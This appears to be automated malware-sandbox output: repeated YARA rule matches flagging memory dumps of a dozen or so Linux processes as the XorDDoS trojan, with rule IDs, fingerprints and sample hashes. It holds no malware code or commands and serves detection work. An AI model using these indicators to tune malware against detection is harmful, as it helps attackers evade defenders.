        Source: 6444.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
        Source: 6444.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
        Source: 6444.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
        Source: 6444.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
        Source: 6444.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
        Source: 6444.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
        Source: 6419.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
        Source: 6419.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
        Source: 6419.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
        Source: 6419.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
        Source: 6419.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
        Source: 6419.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
        Source: 6244.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
        Source: 6244.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
        Source: 6244.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
        Source: 6244.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
        Source: 6244.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
        Source: 6244.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
        Source: 6263.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
        Source: 6263.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
        Source: 6263.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
        Source: 6263.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
        Source: 6263.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
        Source: 6263.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
        Source: 6368.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
        Source: 6368.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
        Source: 6368.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
        Source: 6368.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
        Source: 6368.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
        Source: 6368.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
        Source: 6285.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
        Source: 6285.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
        Source: 6285.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
        Source: 6285.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
        Source: 6285.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
        Source: 6285.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
        Source: 6332.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
        Source: 6332.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
        Source: 6332.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
        Source: 6332.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
        Source: 6332.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
        Source: 6332.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
        Source: 6257.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
        Source: 6257.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
        Source: 6257.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
        Source: 6257.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
        Source: 6257.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
        Source: 6257.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
        Source: 6274.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
        Source: 6274.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
        Source: 6274.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
        Source: 6274.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
        Source: 6274.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
        Source: 6274.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
        Source: 6260.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
        Source: 6260.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
        Source: 6260.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
        Source: 6260.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
        Source: 6260.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
        Source: 6260.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
        Source: 6494.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
        Source: 6494.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
        Source: 6494.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
        Source: 6494.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
        Source: 6494.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
        Source: 6494.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
        Source: 6238.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
        Source: 6238.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
